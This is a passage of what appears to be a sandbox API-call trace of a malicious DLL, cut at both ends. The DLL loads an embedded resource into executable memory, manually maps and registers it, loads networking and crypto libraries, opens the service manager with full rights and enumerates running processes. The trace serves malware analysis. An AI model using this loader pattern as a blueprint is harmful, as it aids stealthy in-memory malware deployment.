(in: BaseAddress=0x7ffe954a0000, Name="VirtualProtect", Ordinal=0x0, ProcedureAddress=0xcd6a0 | out: ProcedureAddress=0xcd6a0*=0x7ffe954c3a90) returned 0x0 [0096.919] LdrGetProcedureAddress (in: BaseAddress=0x7ffe954a0000, Name="FlushInstructionCache", Ordinal=0x0, ProcedureAddress=0xcd6a8 | out: ProcedureAddress=0xcd6a8*=0x7ffe954c0c70) returned 0x0 [0096.919] LdrGetProcedureAddress (in: BaseAddress=0x7ffe954a0000, Name="GetNativeSystemInfo", Ordinal=0x0, ProcedureAddress=0xcd6e8 | out: ProcedureAddress=0xcd6e8*=0x7ffe954c8a00) returned 0x0 [0096.919] LdrGetProcedureAddress (in: BaseAddress=0x7ffe954a0000, Name="Sleep", Ordinal=0x0, ProcedureAddress=0xcd690 | out: ProcedureAddress=0xcd690*=0x7ffe954bb7b0) returned 0x0 [0096.919] LdrGetProcedureAddress (in: BaseAddress=0x7ffe954a0000, Name="RtlAddFunctionTable", Ordinal=0x0, ProcedureAddress=0xcd6f0 | out: ProcedureAddress=0xcd6f0*=0x7ffe954c6a10) returned 0x0 [0096.919] LdrGetProcedureAddress (in: BaseAddress=0x7ffe954a0000, Name="LoadLibraryA", Ordinal=0x0, ProcedureAddress=0xcd698 | out: ProcedureAddress=0xcd698*=0x7ffe954c74d0) returned 0x0 [0096.919] LdrGetProcedureAddress (in: BaseAddress=0x7ffe954a0000, Name="FindResourceW", Ordinal=0x0, ProcedureAddress=0xcd6c0 | out: ProcedureAddress=0xcd6c0*=0x7ffe954c69f0) returned 0x0 [0096.919] LdrGetProcedureAddress (in: BaseAddress=0x7ffe954a0000, Name="LoadResource", Ordinal=0x0, ProcedureAddress=0xcd6c8 | out: ProcedureAddress=0xcd6c8*=0x7ffe954c3e60) returned 0x0 [0096.919] LdrGetProcedureAddress (in: BaseAddress=0x7ffe954a0000, Name="SizeofResource", Ordinal=0x0, ProcedureAddress=0xcd6d0 | out: ProcedureAddress=0xcd6d0*=0x7ffe954c4460) returned 0x0 [0096.920] LdrGetProcedureAddress (in: BaseAddress=0x7ffe954a0000, Name="LockResource", Ordinal=0x0, ProcedureAddress=0xcd6d8 | out: ProcedureAddress=0xcd6d8*=0x7ffe954c4450) returned 0x0 [0096.920] LdrGetProcedureAddress (in: BaseAddress=0x7ffe954a0000, Name="FreeResource", Ordinal=0x0, ProcedureAddress=0xcd6e0 | out: ProcedureAddress=0xcd6e0*=0x7ffe954c8ee0) returned 0x0 [0096.920] FindResourceW (hModule=0x1d20000, lpName=0x1a11, lpType=0x17) returned 0x1d46110 [0096.920] LoadResource (hModule=0x1d20000, hResInfo=0x1d46110) returned 0x1d56970 [0096.920] SizeofResource (hModule=0x1d20000, hResInfo=0x1d46110) returned 0x57600 [0096.920] LockResource (hResData=0x1d56970) returned 0x1d56970 [0096.920] VirtualAlloc (lpAddress=0x0, dwSize=0x57600, flAllocationType=0x3000, flProtect=0x40) returned 0x1de0000 [0096.934] FreeResource (hResData=0x1d56970) returned 0 [0096.934] GetNativeSystemInfo (in: lpSystemInfo=0xcd700 | out: lpSystemInfo=0xcd700*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5507)) [0096.934] VirtualAlloc (lpAddress=0x180000000, dwSize=0x5a000, flAllocationType=0x3000, flProtect=0x4) returned 0x0 [0096.934] VirtualAlloc (lpAddress=0x0, dwSize=0x5a000, flAllocationType=0x3000, flProtect=0x4) returned 0x1e40000 [0096.941] VirtualProtect (in: lpAddress=0x1e41000, dwSize=0x29000, flNewProtect=0x20, lpflOldProtect=0xcd788 | out: lpflOldProtect=0xcd788*=0x4) returned 1 [0096.946] VirtualProtect (in: lpAddress=0x1e6a000, dwSize=0xa00, flNewProtect=0x2, lpflOldProtect=0xcd788 | out: lpflOldProtect=0xcd788*=0x4) returned 1 [0096.946] VirtualProtect (in: lpAddress=0x1e6c000, dwSize=0x1000, flNewProtect=0x2, lpflOldProtect=0xcd788 | out: lpflOldProtect=0xcd788*=0x4) returned 1 [0096.946] VirtualProtect (in: lpAddress=0x1e6d000, dwSize=0x2c800, flNewProtect=0x2, lpflOldProtect=0xcd788 | out: lpflOldProtect=0xcd788*=0x4) returned 1 [0096.947] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x0, dwSize=0x0) returned 1 [0096.947] RtlAddFunctionTable (FunctionTable=0x1e6c000, EntryCount=0x139, BaseAddress=0x1e40000, TargetGp=0x7ffe954c6a10) returned 1 [0096.955] SetErrorMode (uMode=0x0) returned 0x1 [0096.955] GetProcAddress (hModule=0x1d20000, lpProcName="DllRegisterServer") returned 0x1d219a0 [0096.957] GetProcessHeap () returned 0x500000 [0096.957] GetModuleHandleA (lpModuleName="NTDLL") returned 0x7ffe97fe0000 [0096.958] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x58) returned 0x521bb0 [0096.958] GetProcessHeap () returned 0x500000 [0096.958] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x20) returned 0x514ae0 [0096.959] LoadLibraryW (lpLibFileName="advapi32.dll") returned 0x7ffe97600000 [0096.960] GetProcessHeap () returned 0x500000 [0096.961] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x514ae0 | out: hHeap=0x500000) returned 1 [0096.961] GetProcessHeap () returned 0x500000 [0096.961] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x18) returned 0x512b60 [0096.961] LoadLibraryW (lpLibFileName="bcrypt.dll") returned 0x7ffe94490000 [0096.961] GetProcessHeap () returned 0x500000 [0096.961] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x512b60 | out: hHeap=0x500000) returned 1 [0096.961] GetProcessHeap () returned 0x500000 [0096.961] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x18) returned 0x512ae0 [0096.962] LoadLibraryW (lpLibFileName="crypt32.dll") returned 0x7ffe951c0000 [0096.971] GetProcessHeap () returned 0x500000 [0096.971] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x512ae0 | out: hHeap=0x500000) returned 1 [0096.971] GetProcessHeap () returned 0x500000 [0096.971] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x18) returned 0x512ca0 [0096.971] LoadLibraryW (lpLibFileName="shell32.dll") returned 0x7ffe95e70000 [0096.971] GetProcessHeap () returned 0x500000 [0096.971] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x512ca0 | out: hHeap=0x500000) returned 1 [0096.971] GetProcessHeap () returned 0x500000 [0096.971] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x18) returned 0x512ca0 [0096.971] LoadLibraryW (lpLibFileName="shlwapi.dll") returned 0x7ffe95df0000 [0096.971] GetProcessHeap () returned 0x500000 [0096.971] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x512ca0 | out: hHeap=0x500000) returned 1 [0096.971] GetProcessHeap () returned 0x500000 [0096.971] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x18) returned 0x512b60 [0096.971] LoadLibraryW (lpLibFileName="urlmon.dll") returned 0x7ffe8ac40000 [0096.984] GetProcessHeap () returned 0x500000 [0096.984] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x512b60 | out: hHeap=0x500000) returned 1 [0096.984] GetProcessHeap () returned 0x500000 [0096.984] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x18) returned 0x512d60 [0096.984] LoadLibraryW (lpLibFileName="userenv.dll") returned 0x7ffe93d60000 [0096.988] GetProcessHeap () returned 0x500000 [0096.988] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x512d60 | out: hHeap=0x500000) returned 1 [0096.989] GetProcessHeap () returned 0x500000 [0096.989] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x18) returned 0x512b60 [0096.989] LoadLibraryW (lpLibFileName="wininet.dll") returned 0x7ffe89ce0000 [0097.001] GetProcessHeap () returned 0x500000 [0097.001] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x512b60 | out: hHeap=0x500000) returned 1 [0097.001] GetProcessHeap () returned 0x500000 [0097.001] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x20) returned 0x514540 [0097.001] LoadLibraryW (lpLibFileName="wtsapi32.dll") returned 0x7ffe92df0000 [0097.006] GetProcessHeap () returned 0x500000 [0097.007] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x514540 | out: hHeap=0x500000) returned 1 [0097.008] GetProcessHeap () returned 0x500000 [0097.008] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x40) returned 0x517460 [0097.008] GetProcessHeap () returned 0x500000 [0097.008] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x4000) returned 0x529a40 [0097.009] GetProcessHeap () returned 0x500000 [0097.009] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x8) returned 0x506c60 [0097.010] BCryptOpenAlgorithmProvider (in: phAlgorithm=0xce568, pszAlgId="RNG", pszImplementation=0x0, dwFlags=0x0 | out: phAlgorithm=0xce568) returned 0x0 [0097.011] GetProcessHeap () returned 0x500000 [0097.011] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x506c60 | out: hHeap=0x500000) returned 1 [0097.011] BCryptGenRandom (in: hAlgorithm=0x51f3a0, pbBuffer=0x529a40, cbBuffer=0x4000, dwFlags=0x0 | out: pbBuffer=0x529a40) returned 0x0 [0097.011] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x51f3a0, dwFlags=0x0 | out: hAlgorithm=0x51f3a0) returned 0x0 [0097.011] GetProcessHeap () returned 0x500000 [0097.011] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x230) returned 0x51f3a0 [0097.013] GetModuleFileNameW (in: hModule=0x1d20000, lpFilename=0x51f3c4, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\GnynPsiyLKdYjn\\GQeyw.dll" (normalized: "c:\\windows\\system32\\gnynpsiylkdyjn\\gqeyw.dll")) returned 0x2c [0097.024] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x514630 [0097.032] CloseServiceHandle (hSCObject=0x514630) returned 1 [0097.034] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1f0 [0097.144] Process32FirstW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0097.146] GetCurrentProcessId () returned 0xde0 [0097.146] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x75, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0097.147] GetCurrentProcessId () returned 0xde0 [0097.147] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x134, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0097.148] GetCurrentProcessId () returned 0xde0 [0097.148] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0097.148] GetCurrentProcessId () returned 0xde0 [0097.148] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x1bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x178, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0097.149] GetCurrentProcessId () returned 0xde0 [0097.149] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x1c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1b4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0097.150] GetCurrentProcessId () returned 0xde0 [0097.150] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x1f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0097.151] GetCurrentProcessId () returned 0xde0 [0097.151] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1bc, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0097.151] GetCurrentProcessId () returned 0xde0 [0097.151] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1bc, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0097.152] GetCurrentProcessId () returned 0xde0 [0097.152] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x210, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0097.153] GetCurrentProcessId () returned 0xde0 [0097.153] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x210, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0097.153] GetCurrentProcessId () returned 0xde0 [0097.153] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1f8, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0097.154] GetCurrentProcessId () returned 0xde0 [0097.154] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x354, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x57, th32ParentProcessID=0x210, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0097.155] GetCurrentProcessId () returned 0xde0 [0097.155] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x35c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x210, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0097.155] GetCurrentProcessId () returned 0xde0 [0097.155] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x210, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0097.156] GetCurrentProcessId () returned 0xde0 [0097.156] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x210, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0097.156] GetCurrentProcessId () returned 0xde0 [0097.156] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x210, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0097.157] GetCurrentProcessId () returned 0xde0 [0097.157] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x210, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0097.158] GetCurrentProcessId () returned 0xde0 [0097.158] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x478, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x210, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0097.158] GetCurrentProcessId () returned 0xde0 [0097.158] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x210, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0097.159] GetCurrentProcessId () returned 0xde0 [0097.159] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x564, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x354, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0097.160] GetCurrentProcessId () returned 0xde0 [0097.160] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x5cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x210, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0097.160] GetCurrentProcessId () returned 0xde0 [0097.160] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x600, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x270, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0097.161] GetCurrentProcessId () returned 0xde0 [0097.161] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x210, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0097.162] GetCurrentProcessId () returned 0xde0 [0097.162] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x7c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x354, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0097.162] GetCurrentProcessId () returned 0xde0 [0097.162] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x29, th32ParentProcessID=0x7e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0097.163] GetCurrentProcessId () returned 0xde0 [0097.163] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x8c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x270, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0097.164] GetCurrentProcessId () returned 0xde0 [0097.164] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x930, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x270, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0097.164] GetCurrentProcessId () returned 0xde0 [0097.164] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xbb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x354, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0097.165] GetCurrentProcessId () returned 0xde0 [0097.165] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x354, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0097.166] GetCurrentProcessId () returned 0xde0 [0097.166] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xa34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x210, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0097.167] GetCurrentProcessId () returned 0xde0 [0097.167] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x210, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0097.167] GetCurrentProcessId () returned 0xde0 [0097.167] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x270, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0097.168] GetCurrentProcessId () returned 0xde0 [0097.168] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x270, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0097.169] GetCurrentProcessId () returned 0xde0 [0097.169] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x2a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x270, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0097.169] GetCurrentProcessId () returned 0xde0 [0097.169] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0x66c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0097.170] GetCurrentProcessId () returned 0xde0 [0097.170] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xd40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="employee.exe")) returned 1 [0097.171] GetCurrentProcessId () returned 0xde0 [0097.171] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xd50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="structure_indeed.exe")) returned 1 [0097.171] GetCurrentProcessId () returned 0xde0 [0097.171] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="beatdeal.exe")) returned 1 [0097.172] GetCurrentProcessId () returned 0xde0 [0097.172] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="my-technology.exe")) returned 1 [0097.173] GetCurrentProcessId () returned 0xde0 [0097.173] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xd7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="away.exe")) returned 1 [0097.173] GetCurrentProcessId () returned 0xde0 [0097.173] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xd84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="education process memory.exe")) returned 1 [0097.174] GetCurrentProcessId () returned 0xde0 [0097.174] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="period.exe")) returned 1 [0097.175] GetCurrentProcessId () returned 0xde0 [0097.175] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xdb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="focus_wear.exe")) returned 1 [0097.175] GetCurrentProcessId () returned 0xde0 [0097.175] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious-wonder-win.exe")) returned 1 [0097.176] GetCurrentProcessId () returned 0xde0 [0097.176] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xdcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="addressseasonlow.exe")) returned 1 [0097.177] GetCurrentProcessId () returned 0xde0 [0097.177] Process32NextW (in: hSnapshot=0x1f0, lppe=0xce0a0 | out: lppe=0xce0a0*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="newspapertrypositive.exe")) returned 1 [0097.177] 